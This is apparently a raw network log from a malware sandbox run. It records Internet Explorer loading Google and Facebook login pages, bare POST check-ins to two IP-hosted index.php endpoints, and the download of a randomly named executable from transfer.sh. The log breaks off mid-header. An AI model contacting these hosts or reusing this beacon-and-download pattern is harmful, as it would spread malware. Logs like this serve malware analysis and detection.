GEThttps://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2FIEXPLORE.EXERemote address:142.250.179.141:443RequestGET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.google.com
Connection: Keep-Alive
Cookie: __Host-GAPS=1:0XeHgSNK9aL72BFfHCcdoTGNRzS1VQ:dNVuGHZibg56z1f8
ResponseHTTP/1.1 302 Found
Set-Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I; Expires=Mon, 06-Oct-2025 12:02:46 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:46 GMT
Location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSM
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: script-src 'nonce-NsCoCatG9OGZCIdT_f22KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: unsafe-none
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSMIEXPLORE.EXERemote address:142.250.179.141:443RequestGET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSM HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.google.com
Connection: Keep-Alive
Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I
ResponseHTTP/1.1 302 Moved Temporarily
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:46 GMT
Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'nonce-lJig2Y2BMVNOc2zLRm23PA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
GEThttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glifIEXPLORE.EXERemote address:142.250.179.141:443RequestGET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.google.com
Connection: Keep-Alive
Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I
ResponseHTTP/1.1 200 OK
X-Frame-Options: DENY
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:46 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
Content-Security-Policy: script-src 'nonce-W3xKhK7oh4hqoThh_gqnGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
Cross-Origin-Resource-Policy: same-site
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
Remote address:142.250.179.141:443RequestGET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: accounts.google.com
Connection: Keep-Alive
Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I
ResponseHTTP/1.1 302 Moved Temporarily
X-Frame-Options: DENY
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:47 GMT
Location: https://www.google.com/favicon.ico
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'nonce-3eIFnbkGKDrM0tdw8pv4DQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
POSThttps://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=cIEXPLORE.EXERemote address:142.250.179.141:443RequestPOST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=c HTTP/1.1
Accept: */*
X-Same-Domain: 1
x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
x-goog-ext-391502476-jspb: ["S101681747:1696680166053313",null,null,"AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS"]
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: https://accounts.google.com/v3/signin/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: accounts.google.com
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I; OTZ=7239603_56_56__56_
ResponseHTTP/1.1 200 OK
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
Set-Cookie: __Host-GAPS=1:QFaHwjs9ga-wkO4VCW93ou4T_nMKPQ:DVaG1eu79sSL7fOr; Expires=Mon, 06-Oct-2025 12:02:48 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:48 GMT
Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
Cross-Origin-Resource-Policy: same-site
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
Remote address:77.91.124.1:80RequestPOST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 88
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:77.91.68.78:80RequestPOST /help/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.78
Content-Length: 88
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 88
Content-Type: text/html; charset=UTF-8
-
Remote address:77.91.68.78:80RequestPOST /help/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.78
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requesttransfer.shIN AResponsetransfer.shIN A144.76.136.153
-
Remote address:144.76.136.153:443RequestGET /WOHjUAuTPg/pf1sbMGHARiKj7J.exe HTTP/1.1
Host: transfer.sh
ResponseHTTP/1.1 200 OK
Connection: keep-alive
Content-Disposition: attachment; filename="pf1sbMGHARiKj7J.exe"
Content-Length: 606208
Content-Type: application/x-msdos-program
Retry-After: Sat, 07 Oct 2023 14:02:47 GMT
Server: Transfer.sh HTTP Server
Vary: Range, Referer, X-Decrypt-Password
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1696680167
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Date: Sat, 07 Oct 2023 12:02:46 GMT
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN AResponseapps.identrust.comIN CNAMEidentrust.edgesuite.netidentrust.edgesuite.netIN CNAMEa1952.dscq.akamai.neta1952.dscq.akamai.netIN A2.18.121.68a1952.dscq.akamai.netIN A2.18.121.70
-
Remote address:2.18.121.68:80RequestGET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
ResponseHTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT
ETag: "37d-603761e33cf00"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Sat, 07 Oct 2023 13:02:45 GMT
Date: Sat, 07 Oct 2023 12:02:45 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A157.240.247.35
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_card_image_2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: wRZKtl/35CrbFpdeWSFrBg==
Edge-Control: cache-maxage=86400s
Expires: Sat, 07 Oct 2023 13:26:04 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: bSEOEKbiWWyOXC7VRgPwDgIQ8MdQtTehvVdzlS5gAxWbQnbCKxzS/OXh/P7QeqdlX/Ai3XqSBVusxz4Y94bVpQ==
Date: Fri, 06 Oct 2023 13:26:04 GMT
Connection: keep-alive
Content-Length: 21306
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_card_image_3.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: tjvKzjcx509sRQAttysmgw==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 04:54:18 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: vT+bFt6hK8XzyXRsG5H1PbgAEvLT/L04bbxLj4G2FYUut1j51S8V+hcJIwoWloqkjHbjo2MDFVJaXJaa5ZaUtw==
Date: Sat, 07 Oct 2023 04:54:18 GMT
Connection: keep-alive
Content-Length: 35554
-
Remote address:157.240.247.35:443RequestGET /login HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 4v8QWoB08tYmwahViPN5vJuq0MeiYPxtp+UXTuXHoe1XnJ4deArW2fYbyv1XaTgaBqbpZtIl+Qq+MMFNMpGL7Q==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_card_image_1.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: Nmnpiyrpc00QHVchkNDJDQ==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 03:00:01 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: O6mnc//N4agEHGoBW1iivkyJHPapsz43ryVHWY+87MTAxFplAeJvZPZeTYrDMpaufo6yRZW3En0CQqSrCSF7zg==
Date: Sat, 07 Oct 2023 03:00:01 GMT
Connection: keep-alive
Content-Length: 22180
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_card_image_4.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: mXjbZp5JUjt62zr4DVYbGw==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 04:49:56 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: N40VusxJnHurhDBJJilj5gDFHs3tNvUY5eufpl1jfPQ+9Lpmif6JAYNnV7iKF0W9VTL1x8/m75F5AYyIAT8p9g==
Date: Sat, 07 Oct 2023 04:49:56 GMT
Connection: keep-alive
Content-Length: 17083
-
Remote address:8.8.8.8:53Requeststatic.xx.fbcdn.netIN AResponsestatic.xx.fbcdn.netIN CNAMEscontent.xx.fbcdn.netscontent.xx.fbcdn.netIN A157.240.201.15
-
Remote address:8.8.8.8:53Requestfacebook.comIN AResponsefacebook.comIN A157.240.201.35
-
Remote address:157.240.201.35:443RequestGET /security/hsts-pixel.gif?c=3.2 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
cross-origin-opener-policy: same-origin-allow-popups
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: RKIN3z2tiwEPFS4O/3d77DWwPuCXwlNoHp+/t1PD+xJvYCgw1RZvsMTJKXqkQFspIifg5kwWw664TjEFmcoPdg==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/g6qk785LM34.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/y9/l/0,cross/g6qk785LM34.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 19:41:37 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: JP/QalUbMzqe1yJU0o9DPA==
X-FB-Debug: 5a0MtHOEB563VdYr6MF7zobd1Ni2l/GVA2NjzLmnBYp0WZperxrq9S0ePECNNcQ0XeEG1Dy1apgmNBLikFpoyQ==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 4404
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 27 Sep 2024 02:17:45 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: NDlpijDrkamGO5A0S/KtZA==
X-FB-Debug: Kcp8VcRaoBe9WUuigSBY5RxiLnerWu5/EqR5JLZnM+PkpfWVys5H/oRMPytG+av1QtvnO6VqiQTc1wZecI61KA==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 299
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yI/r/8iBPf52GdU5.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 27 Sep 2024 17:05:17 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
